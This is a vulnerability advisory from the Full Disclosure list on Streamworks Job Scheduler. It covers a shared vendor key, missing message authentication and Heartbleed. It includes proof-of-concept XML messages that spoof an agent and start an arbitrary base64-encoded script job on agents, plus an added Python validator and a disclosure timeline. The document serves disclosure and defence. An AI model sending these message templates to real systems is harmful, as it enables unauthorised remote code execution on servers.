Full Disclosure mailing list archives

secuvera-SA-2016-01: Multiple authentication weaknesses in Arvato Systems Streamworks Job Scheduler


From: Simon Bieber <sbieber () secuvera de>
Date: Mon, 14 Jan 2019 12:17:45 +0100


Affected Products
Streamworks Job Scheduler Release 7 (older/newer releases have not been tested)

References
Secuvera-SA-2016-01 https://www.secuvera.de/advisories/secuvera-SA-2016-01.txt (used for updates) No CVE number could be assigned (vendor not listed under cve.mitre.org/data/board/archives/2016-01/msg00015.html)

Summary:
Arvato Systems Streamworks Job Scheduler is a software product for automation purposes. It helps "to plan, maintain, control and monitor all of your automatable IT processes" (source: vendor product homepage). It consists of different types of services: an application server daemon and a processing server daemon that controls one or multiple agent daemons installed on the operating servers where the workload has to be done.

During a penetration test at a customer's site, three weaknesses concerning communication authentication and one known TLS vulnerability were discovered:

1) All agents installed on server systems use the same X.509 certificate and private key that were issued by the vendor for authentication.

2) The processing server component does not check received messages properly for authenticity.

3) Agents installed on servers do not check received messages properly for authenticity.

4) Agents and processing servers are vulnerable to the TLS Heartbleed attack (CVE-2014-0160 - see https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0160).

Effect:
1) If a single system is compromised and its authentication material is stolen, the certificates of all agents have to be revoked and replaced. In addition, this expands the effect of 3) to the entire environment, not just single systems.

2) An attacker with knowledge of the message syntax of the product and the authentication material is able to add, change or delete data within the Streamworks database.

3) An attacker with knowledge of the message syntax of the product and the authentication material is able to create new jobs or execute available jobs on servers with agents installed that are located within the same network. This can lead to a complete loss of integrity, confidentiality or availability of the respective system or of the data stored/processed on it.

4) An unauthenticated remote attacker is able to read content of the process memory.

Vulnerable components and scripts:
   Streamworks Job Scheduler Processing Server Release 7.1
   Streamworks Job Scheduler Agent Release 7.1
   older releases have not been tested

Examples:
In the following, samples to exploit 2) and 3) are given. Replace the information within square brackets:

2) By sending the following XML message to a processing server it is possible, as a proof of concept, to change the system information of a legitimately configured client. Here the OS info of the client was slightly changed:

   <AgentNotifyStarted ProcessId="7044" AgentVersion="3.1.36">
     <ComHeader Version="1.0">
       <MandatorCode>0100</MandatorCode>
       <MsgCreateTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].745Z</MsgCreateTime>
       <MsgSendTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].963Z</MsgSendTime>
       <SourceEndpoint Address="0.0.0.0" Port="30000" SysId="[Hostname of legitimate client]" />
       <DestinationEndpoint Address="[FQDN of processing server]" Port="9600" SysId="[FQDN of processing server]" />
       <Sequence>0</Sequence>
     </ComHeader>
     <SystemInformation>
       <OsType>Windows</OsType>
       <OsInfo>Pentest Windows!</OsInfo>
       <OsLocale>de_DE.windows-1252</OsLocale>
     </SystemInformation>
     <KnownJobsList>
     </KnownJobsList>
     <FileTransferOptions Mode="ALL" BlockSize="0" />
     <Cli CliOptions="Enabled" />
   </AgentNotifyStarted>


 -------------


3) By sending an XML message of the following type to an agent, a new job can be created and executed on that system:

   <ServerRequestStartJob>
     <ComHeader Version="0.1">
       <MandatorCode>0100</MandatorCode>
       <MsgCreateTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].1061367Z</MsgCreateTime>
       <MsgSendTime>[YYYY]-[MM]-[DD]T[HH]:[MM]:[SS].1061367Z</MsgSendTime>
       <SourceEndpoint Address="[FQDN of processing server]" Port="9600" SysId="[FQDN of processing server]" />
       <DestinationEndpoint Address="[IP of server with agent installed]" Port="30000" SysId="[Hostname of server with agent installed]" />
       <Sequence>1</Sequence>
       <MandatorId>0100</MandatorId>
     </ComHeader>
     <JobStartInfo>
       <JobInfo ServerJobId="118291965_1" ExecutionNo="1" PlanDate="[YYYY]-[MM]-[DD]" StreamName="[NewStreamName]" JobName="[NewJobName]" Run="1" />
       <UserName>[Username under which the agent should run the script, e.g. LOCAL\System]</UserName>
       <Password>[Password of the user, if needed]</Password>
       <UseUserProfile>true</UseUserProfile>
       <MainScript>[base64-encoded script code, e.g. "cmVtDQpDOlxXaW5kb3dzXE5vdGVwYWQuZXhl" to start notepad.exe on a Windows host]</MainScript>
       <KeepJoblogDays>10</KeepJoblogDays>
     </JobStartInfo>
   </ServerRequestStartJob>
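Both 2) and 3) come down to the same missing check: the receiver trusts the SysId written into the ComHeader instead of the identity the transport actually authenticated. The following is an added example, not Streamworks code (the vendor's fix in Release 9.3 is not public), showing the kind of validation a processing server or agent would need before acting on such a message. It assumes the TLS layer hands the receiver an authenticated peer identity (e.g. the CN of a per-host client certificate), passed in here as a plain string; hostnames, timestamps and the two sample messages are constructed for the example. Note that while 1) is unfixed, every agent (and anyone holding the stolen key) authenticates as the same identity, so this check is only meaningful together with per-host credentials.

```python
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta, timezone

# Constructed samples modelled on the two proof-of-concept messages above.
# Hostnames are placeholders, not real systems.
SPOOFED_NOTIFY = """<AgentNotifyStarted ProcessId="7044" AgentVersion="3.1.36">
  <ComHeader Version="1.0">
    <MandatorCode>0100</MandatorCode>
    <MsgCreateTime>2016-02-24T10:26:11.745Z</MsgCreateTime>
    <MsgSendTime>2016-02-24T10:26:11.963Z</MsgSendTime>
    <SourceEndpoint Address="0.0.0.0" Port="30000" SysId="agent01.example.test" />
    <DestinationEndpoint Address="psrv.example.test" Port="9600" SysId="psrv.example.test" />
    <Sequence>0</Sequence>
  </ComHeader>
  <SystemInformation><OsType>Windows</OsType><OsInfo>Pentest Windows!</OsInfo></SystemInformation>
</AgentNotifyStarted>"""

SPOOFED_START_JOB = """<ServerRequestStartJob>
  <ComHeader Version="0.1">
    <MandatorCode>0100</MandatorCode>
    <MsgCreateTime>2016-02-24T10:26:11.1061367Z</MsgCreateTime>
    <MsgSendTime>2016-02-24T10:26:11.1061367Z</MsgSendTime>
    <SourceEndpoint Address="psrv.example.test" Port="9600" SysId="psrv.example.test" />
    <DestinationEndpoint Address="10.0.0.5" Port="30000" SysId="agent01.example.test" />
    <Sequence>1</Sequence>
  </ComHeader>
  <JobStartInfo><MainScript>cmVtDQpDOlxXaW5kb3dzXE5vdGVwYWQuZXhl</MainScript></JobStartInfo>
</ServerRequestStartJob>"""

NOW = datetime(2016, 2, 24, 10, 27, 0, tzinfo=timezone.utc)   # assumed receiver clock
LATER = NOW + timedelta(hours=1)                              # well outside the skew window


def parse_header_time(value):
    """Parse '2016-02-24T10:26:11.745Z' (or 7-digit fractions) into an aware UTC datetime."""
    value = value.strip().rstrip("Z")
    if "." in value:
        head, frac = value.split(".", 1)
        value = head + "." + frac[:6].ljust(6, "0")  # fromisoformat accepts at most 6 digits
    return datetime.fromisoformat(value).replace(tzinfo=timezone.utc)


def validate_message(xml_text, peer_identity, my_sysid, last_sequence, now,
                     max_skew=timedelta(minutes=5)):
    """Return (accepted, reason).

    peer_identity is whatever the transport authenticated; it is the one value
    the sender cannot choose freely, so every header claim is checked against it.
    """
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return False, f"malformed XML: {exc}"
    header = root.find("ComHeader")
    if header is None:
        return False, "missing ComHeader"
    src, dst = header.find("SourceEndpoint"), header.find("DestinationEndpoint")
    if src is None or dst is None:
        return False, "missing SourceEndpoint/DestinationEndpoint"
    # 1. The claimed source must be the authenticated peer, not merely a known hostname.
    if src.get("SysId") != peer_identity:
        return False, f"SourceEndpoint SysId {src.get('SysId')!r} != authenticated peer {peer_identity!r}"
    # 2. The message must be addressed to this node (no relaying to another target).
    if dst.get("SysId") != my_sysid:
        return False, f"DestinationEndpoint SysId {dst.get('SysId')!r} != own SysId {my_sysid!r}"
    # 3. Sequence must advance per peer, so a captured message cannot be replayed.
    try:
        seq = int(header.findtext("Sequence", ""))
    except ValueError:
        return False, "missing or non-numeric Sequence"
    if seq <= last_sequence:
        return False, f"replayed or stale Sequence {seq} (last seen {last_sequence})"
    # 4. Freshness: reject messages created outside the allowed clock skew.
    try:
        created = parse_header_time(header.findtext("MsgCreateTime", ""))
    except ValueError:
        return False, "missing or malformed MsgCreateTime"
    if abs(now - created) > max_skew:
        return False, f"MsgCreateTime {created.isoformat()} outside {max_skew} of receiver clock"
    return True, f"{root.tag} from {peer_identity}, Sequence {seq}"


if __name__ == "__main__":
    # Processing-server side: the notify claims to be agent01 but arrives from another host.
    print(validate_message(SPOOFED_NOTIFY, "rogue.example.test", "psrv.example.test", -1, NOW))
    print(validate_message(SPOOFED_NOTIFY, "agent01.example.test", "psrv.example.test", -1, NOW))
    # Agent side: a job start must come from the authenticated processing server.
    print(validate_message(SPOOFED_START_JOB, "rogue.example.test", "agent01.example.test", 0, NOW))
    print(validate_message(SPOOFED_START_JOB, "psrv.example.test", "agent01.example.test", 0, NOW))
```

The same function serves both directions: a processing server calls it with its own SysId and the agent identity from the client certificate, an agent calls it with its hostname and expects the processing server's identity. The per-peer last_sequence would normally be persisted so that a message captured on the wire cannot be replayed after a restart.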

Solution:
   Install Streamworks Release 9.3
   (https://it.arvato.com/de/solutions/it-solutions/lp/streamworks-release-9-3.html - page available in German only)

Disclosure Timeline:
   2016/05/12 vulnerabilities discovered
   2016/05/30 vendor initially contacted
   2016/06/13 sales representative replied
   2016/06/14 technically responsible contact details received
   2016/07/01 technical personnel contacted, appointment to discuss findings made
   2016/07/11 submitted technical details to responsible personnel
   2016/07/12 responsible product manager replied. Committed to extend disclosure timeline for comprehensible reasons. New disclosure timeline: end of September 2016
   2016/09/08 product manager replied, suggested meeting to discuss fixes
   2016/09/27 meeting took place, half of the vulnerabilities were fixed. Timeline until disclosure extended again due to difficult changes. Disclosure timeline extended to end of April 2017
   2017/04/20 contacted vendor again to remind of the near end of the disclosure timeline
   2017/04/27 reply and ongoing discussion about when the fix will be shipped
   2017/05/20 vendor replied that, based on customer experience, fewer releases are made. The fix will be shipped in the second quarter of 2018. Extended disclosure timeline until the end of June 2018
   2018/04/03 contacted vendor as reminder and to get a release ship date
   2018/04/09 vendor replied that the issues will be fixed in release 9.3 (shipped in the 2nd quarter of 2018). Final disclosure date: 2019/01/14, after a sufficient grace period for customers to install the fixed release
   2019/01/14 public advisory disclosure


Credits
        Simon Bieber, secuvera GmbH
        sbieber () secuvera de
        https://www.secuvera.de

Disclaimer:
All information is provided without warranty. The intent is to provide information to secure infrastructure and/or systems, not to be able to attack or damage. Therefore secuvera shall not be liable for any direct or indirect damages that might be caused by using this information.




_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

